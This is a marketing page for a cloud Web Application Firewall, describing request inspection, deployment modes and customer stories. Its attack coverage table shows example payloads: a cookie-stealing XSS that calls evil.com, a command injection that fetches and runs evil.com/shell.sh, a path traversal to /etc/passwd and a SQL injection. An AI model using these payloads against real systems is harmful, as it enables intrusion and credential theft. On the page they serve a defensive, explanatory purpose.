All systems operational · 99.99% uptime SLA
Console Support Docs Blog Contact →
WAF — Web Application Firewall · Layer 7 · ML + Rule Engine · CNAME or Load Balancer

Malicious traffic
stopped before it
reaches your app.

NubexCloud WAF sits as a reverse proxy in front of your web application — every HTTP request passes through it first. SQL injections, XSS, command injections, CC floods, path traversal — identified and blocked at the application layer using a combination of curated rule sets and machine learning. Your server only receives clean, verified traffic.

Enable WAF → Attack Coverage
L7Application layer
8+Attack types blocked
2Deploy modes
180dLog retention
Inbound traffic WAF inspection Clean traffic only GET /users ?id=1 OR 1=1-- SQL Injection GET /search <script>alert(1)</script> XSS Attack 50,000 req/s GET /api/product/1 CC Flood WAF INSPECTION ENGINE SQL rule matched XSS pattern found CC rate exceeded POST /api · clean GET /page · clean ML + Rule engine ACTIVE 🖥 Origin Server clean traffic only ✓ BLOCKED & DROPPED SQL · XSS · CC — never reach origin Layer 7 active Origin protected ML + Rule-based detection
8+
Attack categories
OWASP Top 10 and beyond
2
Deploy modes
CNAME · Load Balancer
5min
To enable (CNAME)
No server changes needed
180d
Log retention
Attack + access logs per domain
What WAF Reads

WAF doesn't see IP addresses. It reads your requests.

A network firewall sees source IP, port, and protocol — nothing inside the HTTP request. WAF reads the complete HTTP context: every parameter, header, cookie, and body field. This is why SQL injection passes through network firewalls and stops at WAF.

HTTP Request — WAF inspects everything
POST /api/transfer HTTP/1.1
Host: api.myapp.com checked ✓
User-Agent: Mozilla/5.0 verified ✓
Referer: https://myapp.com allowed ✓
Cookie: session=abc123 scanned ✓
Body: {"amount":-9999} flagged ✗
Rule match: negative amount in transfer request → BLOCKED
🔗
URL & Query Parameters
Scans every URL parameter for SQL injection, path traversal, and encoding tricks
📬
HTTP Headers
Inspects User-Agent, Referer, Cookie, Content-Type and custom headers for attack patterns
📦
Request Body
Deep-inspects POST body, JSON payloads, form data, and file uploads for WebShell and injection patterns
🍪
Cookies & Session Data
Analyses cookie values for tampering attempts, session fixation, and XSS payload injection
📊
Request Rate & Behaviour
Monitors per-IP request frequency, Referer patterns, and User-Agent behaviour for CC attack signatures
🛡
L7
Application layer
Operates above the network — reads HTTP content that network firewalls are blind to
🤖
ML
Machine learning engine
Detects novel attacks and obfuscated payloads that bypass rule-based systems
Any
Origin — SaaS mode
Protects any web application regardless of where it is hosted — NubexCloud or external
🩹
Virtual
Patches
Zero-day CVE rules pushed within hours of disclosure — protecting apps before patches are released
Attack Coverage

Every major web exploit. Blocked before it runs.

WAF includes continuously updated rules for the full OWASP Top 10 and the most exploited web vulnerability classes — with virtual patches for newly disclosed CVEs before your team has time to update the application.

Attack type
What it does / example payload
WAF response
💉 SQL Injection
Database manipulation
id=1' UNION SELECT * FROM users--
Block · 403
📜 XSS
Cross-site scripting
<img src=x onerror=fetch('evil.com/'+document.cookie)>
Block · 403
🐚 WebShell
Remote code execution
— upload detection
Block + Isolate
⌨️ Command Injection
OS command execution
file=report; wget http://evil.com/shell.sh | bash
Block · 403
📂 Path Traversal
File system access
doc=../../../../etc/passwd
Block · 403
🌊 CC Attack
HTTP flood (app-layer)
50,000 GET /api/search requests/sec · distributed IPs
Rate limit + CAPTCHA
🔍 Vulnerability Scan
Reconnaissance
Scanning: /.env · /admin · /phpinfo · /wp-login.php
Block + Alert
⚠️ HTTP Protocol
Protocol-level exploit
HTTP smuggling · malformed headers · oversized body
Drop · 400
Deployment Modes

Enable in minutes. Zero changes to your origin.

Two integration paths — choose based on your existing infrastructure. Both inspect all HTTP/HTTPS traffic identically; only the routing method differs.

SaaS Mode · Recommended

CNAME redirect — 5 minutes

User
CNAME
WAF
clean
Origin
1
Update DNS CNAME
myapp.com → waf.nubexcloud.com
2
Configure origin
Set your real origin IP or domain in WAF console
Protection active
All traffic inspected · origin receives only clean requests
Works for any origin — NubexCloud, AWS, GCP, or on-premises
Load Balancer Mode

LB integration — no DNS change

User
existing IP
LB → WAF
Backend
1
Add forwarding rule in LB
Point LB listener to WAF inspection endpoint
2
Register domain in WAF
WAF inspects traffic and forwards clean requests to backend
DNS unchanged
Same external IP · no DNS propagation wait
Ideal when you already use NubexCloud Load Balancer
Platform Features

Detection. Control. Visibility. All included.

WAF is a complete web security platform — not just a block list. Fine-grained access control, real-time attack reporting, 180-day log archive, certificate management, and multi-domain alert management all come with every plan.

🛡
Managed WAF Rules
Continuously updated rule set covering OWASP Top 10, common CVEs, and exploitation techniques. New rules pushed automatically — no manual updates needed.
🤖
Machine Learning Detection
Behavioural anomaly model trained on your traffic baseline. Detects novel attack payloads, encoded injections, and zero-day exploits that rule sets miss.
🌊
CC Attack Protection
Rate limiting, CAPTCHA challenge, and human-machine recognition for HTTP flood attacks. Auto-scales to absorb CC attack traffic surges without capacity limits.
🎯
Precise Access Control
Custom rules combining IP, URL, HTTP method, Referer, User-Agent, and header conditions. Multi-layer rule logic for anti-hotlink, admin protection, and geo-based restrictions.
🌍
Regional IP Blocking
Block entire countries or regions at the WAF edge — before requests reach your origin. IP + geographic blocking combined with global blacklist and whitelist management.
📋
Log Service (180-day)
Real-time 3-day query, 7-day download, and 180-day archive with extension pack. Full attack log and access log per domain — with structured format for SIEM integration.
Complete Security Stack

WAF + Anti-DDoS = full-spectrum protection.

WAF and Anti-DDoS operate on different layers and protect against different threats. Together they cover the entire attack surface — volumetric network attacks and application-layer exploits — leaving no vector unprotected.

Anti-DDoS — Layers 3/4
Network & Volumetric
Absorbs SYN floods, UDP floods, ICMP floods, and high-volume volumetric attacks (up to 1.2 Tbps) at the network layer — before traffic reaches your application stack.
✓ SYN / ACK / UDP / ICMP Flood
✓ Volumetric up to 1.2 Tbps
✓ Second-level switching (Traffic Cleaning)
+
WAF — Layer 7
Application & Content
Inspects every HTTP request for application-layer attacks — SQL injection, XSS, WebShell, command injection — that pass through network firewalls and DDoS protection undetected.
✓ SQL Injection / XSS / WebShell
✓ CC attacks / Path traversal
✓ ML + Rules · Virtual patches
Together: complete protection across all attack vectors
DDoS absorbs volumetric attacks at the network layer. WAF inspects what passes through at the application layer. No attack vector left uncovered.
Customer Stories

Attacks blocked. Applications protected.

E-commerce · SaaS mode · Dubai
12K
SQL injection attempts blocked — first week
"We enabled WAF via CNAME in five minutes. Within an hour we saw in the attack dashboard that our product search endpoint was being probed constantly. Every attempt blocked. We had no idea this was happening before WAF gave us visibility."
CTO · Online retail platform · Dubai
SaaS platform · LB mode · Riyadh
0
Data breach incidents during 4 exploitable XSS vulnerabilities
"A pentest found 4 XSS vulnerabilities in our app. We deployed WAF in LB mode while our developers patched. WAF blocked every exploitation attempt during that window. Zero incidents, zero exposure."
VP Engineering · B2B SaaS · Riyadh
News media · SaaS mode · Cairo
99%
Uptime during 40,000 req/s CC attack on election night
"Election night is our peak traffic event. This time a CC attack hit 40K requests/sec simultaneously. WAF's rate limiting contained it entirely — our editorial team noticed nothing, and our readers had no interruption."
Head of Technology · Digital news · Cairo
Trusted by teams across the region
Falcon AITradeSparkMasaarNEXAGENSalam DigitalOrbita
Global Network

A truly global infrastructure for fast, reliable service delivery.

26
Regions
33
Availability Zones
25ms
Regional latency
99.95%
SLA uptime
Active region
Hub region (Dubai HQ)
Backbone link
FAQ

Common questions about WAF

Start protecting your application

Every request inspected.
Every attack stopped.

SQL injection, XSS, CC attacks, WebShell — blocked at the application layer before they touch your code. CNAME deployment in 5 minutes. No server changes. Any origin.

Enable WAF → See All Features
Layer 7
HTTP inspection
ML+Rules
Hybrid detection
5 min
To activate
Any origin
Cloud or on-prem